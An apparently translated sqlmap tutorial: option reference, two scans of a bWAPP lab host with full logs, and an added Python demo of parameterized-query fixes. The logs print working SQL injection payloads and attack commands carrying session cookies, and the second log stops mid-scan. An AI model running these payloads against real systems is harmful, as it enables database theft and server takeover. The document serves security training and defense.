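Introduction to sqlmap

sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers. It has a powerful detection engine and a broad set of features, including database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.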

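sqlmap features

  • Full support for the MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.

  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

  • Support for connecting directly to the database without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.

  • Support for enumerating users, password hashes, privileges, roles, databases, tables and columns.

  • Automatic recognition of password hash formats and support for cracking them with a dictionary-based attack.

  • Support for dumping database tables entirely, or a range of entries or specific columns as the user chooses. The user can also choose to dump only a range of characters from each column's entries.

  • Support for searching for specific database names, specific tables across all databases, or specific columns across all database tables. This is useful, for example, for identifying tables that contain custom application credentials, where the relevant column names contain strings such as name and pass.

  • Support for downloading and uploading any file from and to the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

  • Support for executing arbitrary commands on the database server's underlying operating system and retrieving their standard output when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

  • Support for establishing an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. Depending on the user's choice, this channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session.

  • Support for escalating the database process' user privileges via Metasploit's Meterpreter getsystem command.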

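Common sqlmap options

Target: at least one of these options must be provided to define the target

  • -u URL, --url=URL  Target URL (e.g. "http://www.site.com/vuln.php?id=1")

  • -g GOOGLEDORK  Process Google dork results as target URLs

Request: these options specify how to connect to the target URL

  • --cookie=COOKIE  HTTP Cookie header value (e.g. "PHPSESSID=a8d127e…")

  • --random-agent  Use a randomly selected HTTP User-Agent header value

  • --proxy=PROXY  Use a proxy to connect to the target URL

  • --tor  Use the Tor anonymity network

  • --check-tor  Check whether Tor is being used properly

Injection: these options specify which parameters to test and provide custom injection payloads and optional tamper scripts

  • -p TESTPARAMETER  Testable parameter(s)

  • --dbms=DBMS  Force the back-end DBMS to the provided value

Detection: these options customize the detection phase

  • --level=LEVEL  Level of tests to perform (1-5, default 1)

  • --risk=RISK  Risk of tests to perform (1-3, default 1)

Techniques:

  • --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

Enumeration: these options enumerate the back-end database management system's information, structure and the data contained in its tables

  • -a, --all  Retrieve everything

  • -b, --banner  Retrieve the DBMS banner

  • --current-user  Retrieve the DBMS current user

  • --current-db  Retrieve the DBMS current database

  • --passwords  Enumerate DBMS user password hashes

  • --tables  Enumerate DBMS database tables

  • --columns  Enumerate DBMS database table columns

  • --schema  Enumerate the DBMS schema

  • --dump  Dump DBMS database table entries

  • --dump-all  Dump the table entries of all DBMS databases

  • -D DB  DBMS database to enumerate

  • -T TBL  DBMS database table(s) to enumerate

  • -C COL  DBMS database table column(s) to enumerate

Operating system access: these options access the operating system underlying the back-end database management system

  • --os-shell  Prompt for an interactive operating system shell

  • --os-pwn  Prompt for an OOB shell, Meterpreter or VNC

General: these options set some general working parameters

  • --batch  Never ask for user input, use the default behavior

  • --flush-session  Flush the session files for the current target

Miscellaneous: these options do not fit into any other category

  • --wizard  Simple wizard interface for beginners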

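sqlmap usage example 1

Notes:

1. Scan the bWAPP - Login injection point with the session cookie attached; all other options are left unset (defaults)

2. During the scan, sqlmap prompts for choices about what to test

3. When the scan finishes, the results are printed; if an injection point exists, the injection type and the injection payload are shown

sqlmap -u "http://8.142.109.131:8080/sqli_2.php?movie=1&action=go" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

Output of the scan and analysis: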

$ sqlmap -u "http://8.142.109.131:8080/sqli_2.php?movie=1&action=go" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:26:54 /2022-06-17/

[11:26:54] [INFO] testing connection to the target URL
[11:26:54] [WARNING] potential CAPTCHA protection mechanism detected
[11:26:54] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:26:55] [INFO] testing if the target URL content is stable
[11:26:55] [INFO] target URL content is stable
[11:26:55] [INFO] testing if GET parameter 'movie' is dynamic
[11:26:55] [WARNING] GET parameter 'movie' does not appear to be dynamic
[11:26:55] [INFO] heuristic (basic) test shows that GET parameter 'movie' might be injectable (possible DBMS: 'MySQL')
[11:26:55] [INFO] heuristic (XSS) test shows that GET parameter 'movie' might be vulnerable to cross-site scripting (XSS) attacks
[11:26:55] [INFO] testing for SQL injection on GET parameter 'movie'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:28:35] [WARNING] reflective value(s) found and filtering out
[11:28:36] [INFO] GET parameter 'movie' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Cobra Commander")
[11:28:36] [INFO] testing 'Generic inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:28:36] [INFO] GET parameter 'movie' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[11:28:36] [INFO] testing 'MySQL inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:28:36] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[11:28:37] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:28:59] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:28:59] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[11:28:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:29:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:29:10] [INFO] GET parameter 'movie' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:29:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:29:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:29:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:29:10] [INFO] target URL appears to have 7 columns in query
[11:29:11] [INFO] GET parameter 'movie' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'movie' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[11:29:36] [INFO] testing if GET parameter 'action' is dynamic
[11:29:36] [WARNING] GET parameter 'action' does not appear to be dynamic
[11:29:36] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[11:29:36] [INFO] testing for SQL injection on GET parameter 'action'
[11:29:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:29:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:29:37] [INFO] testing 'Generic inline queries'
[11:29:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:29:47] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:29:52] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:29:57] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:30:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:07] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:17] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[11:30:24] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:30:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:30:38] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:30:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:30:46] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:30:49] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[11:30:53] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:30:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:31:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:04] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:31:35] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[11:31:39] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL inline queries'
[11:31:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:31:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:31:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:31:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:31:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:31:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:31:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:32:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:32:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:32:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:32:09] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:32:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:32:14] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:32:16] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[11:32:20] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[11:32:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[11:32:28] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[11:32:31] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[11:32:35] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[11:32:37] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[11:32:39] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[11:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:32:45] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:32:48] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:32:54] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:32:58] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:33:03] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:33:07] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:33:09] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:11] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:33:13] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[11:33:13] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:33:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[11:33:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[11:33:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:33:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:34:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[11:34:33] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3858 HTTP(s) requests:
---
Parameter: movie (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: movie=1 AND 8304=8304&action=go

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: movie=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170717671,(SELECT (ELT(6100=6100,1))),0x7176706271,0x78))s), 8446744073709551610, 8446744073709551610)))&action=go

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: movie=1 AND (SELECT 6517 FROM (SELECT(SLEEP(5)))DXhM)&action=go

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: movie=-4573 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170717671,0x6c7642426e6e6d6c76616d6c65767367616c716f7266585344614a47594465704259774f73704c72,0x7176706271),NULL,NULL-- -&action=go
---
[11:34:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[11:34:33] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'

[*] ending @ 11:34:33 /2022-06-17/
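
Why the reported payloads work and what removes the injection point, as an added example (not code from bWAPP, sqlmap or the original post). An in-memory SQLite table stands in for the MySQL back end; the table layout, sample rows and function names are assumptions, the false twin of the boolean payload is constructed, and the CONCAT(0x…) marker of the UNION payload is replaced by a plain string literal.

```python
import sqlite3

# Boolean payload copied from the sqlmap report above, plus a constructed false twin.
TRUE_PAYLOAD = "1 AND 8304=8304"
FALSE_PAYLOAD = "1 AND 8304=8305"
# Same shape as the reported 7-column UNION payload; the CONCAT(0x...) marker is
# replaced by a string literal constructed for this example.
UNION_PAYLOAD = "-4573 UNION ALL SELECT NULL,NULL,NULL,NULL,'marker',NULL,NULL-- -"


def make_db():
    """In-memory stand-in for the movies table (constructed sample data, 7 columns)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT, "
        "genre TEXT, main_character TEXT, imdb TEXT, tickets_stock INTEGER)"
    )
    db.executemany(
        "INSERT INTO movies VALUES (?,?,?,?,?,?,?)",
        [
            (1, "Sample Movie A", "2013", "action", "Cobra Commander", "tt0000001", 100),
            (2, "Sample Movie B", "2008", "action", "Sample Hero", "tt0000002", 53),
        ],
    )
    return db


def lookup_vulnerable(db, movie):
    # The request value becomes part of the SQL text, so the database parses it as SQL.
    return db.execute("SELECT * FROM movies WHERE id = " + movie).fetchall()


def lookup_parameterized(db, movie):
    # The statement text is fixed; the request value is bound as data only.
    return db.execute("SELECT * FROM movies WHERE id = ?", (movie,)).fetchall()


def lookup_validated(db, movie):
    # Defense in depth: reject anything that is not a plain decimal id before querying.
    if not (movie.isascii() and movie.isdigit()):
        raise ValueError("movie must be a non-negative integer")
    return lookup_parameterized(db, int(movie))


def has_boolean_oracle(lookup, db):
    """True when the TRUE and FALSE payloads yield different responses.

    That difference is the signal a boolean-based blind test relies on.
    """
    return lookup(db, TRUE_PAYLOAD) != lookup(db, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, boolean oracle:   ", has_boolean_oracle(lookup_vulnerable, db))
    print("parameterized, boolean oracle:", has_boolean_oracle(lookup_parameterized, db))
    print("vulnerable, UNION rows:       ", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterized, UNION rows:    ", lookup_parameterized(db, UNION_PAYLOAD))
```

With the value bound as a parameter both boolean payloads return the same (empty) result and the UNION row never appears, so none of the techniques in the report has anything to measure.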

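sqlmap usage example 2

Notes:

1. Scan the bWAPP - Login injection point with the session cookie attached, specifying mysql via -D "mysql" (note that -D names the database to enumerate; the option that forces the back-end DBMS type is --dbms, e.g. --dbms=mysql, which is why the output below still asks whether to skip payloads for other DBMSes)

2. During the scan, sqlmap prompts for choices; sensible answers narrow the scope of the scan

3. When the scan finishes, the results are printed; if an injection point exists, the injection type and the injection payload are shown

sqlmap -u "http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

Output of the scan and analysis: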

$ sqlmap -u "http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.6#pip}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:10:49 /2022-06-16/

[18:10:49] [INFO] testing connection to the target URL
[18:10:51] [WARNING] potential CAPTCHA protection mechanism detected
[18:10:51] [INFO] testing if the target URL content is stable
[18:10:51] [INFO] target URL content is stable
[18:10:51] [INFO] testing if GET parameter 'title' is dynamic
[18:10:52] [WARNING] GET parameter 'title' does not appear to be dynamic
[18:10:52] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[18:10:52] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:52] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:11:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:11:53] [WARNING] reflective value(s) found and filtering out
[18:11:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:11:54] [INFO] testing 'Generic inline queries'
[18:11:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:11:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:12:04] [INFO] GET parameter 'title' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Z")
[18:12:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:12:04] [INFO] GET parameter 'title' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[18:12:04] [INFO] testing 'MySQL inline queries'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:15] [INFO] GET parameter 'title' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:12:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:12:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:12:16] [INFO] target URL appears to have 7 columns in query
[18:12:16] [INFO] GET parameter 'title' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[18:12:16] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[18:12:53] [INFO] testing if GET parameter 'action' is dynamic
[18:12:53] [WARNING] GET parameter 'action' does not appear to be dynamic
[18:12:53] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[18:12:53] [INFO] testing for SQL injection on GET parameter 'action'
[18:12:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:54] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:54] [INFO] testing 'Generic inline queries'
[18:12:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:13:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:13:08] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:13:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:24] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:31] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:40] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:13:55] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[18:14:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
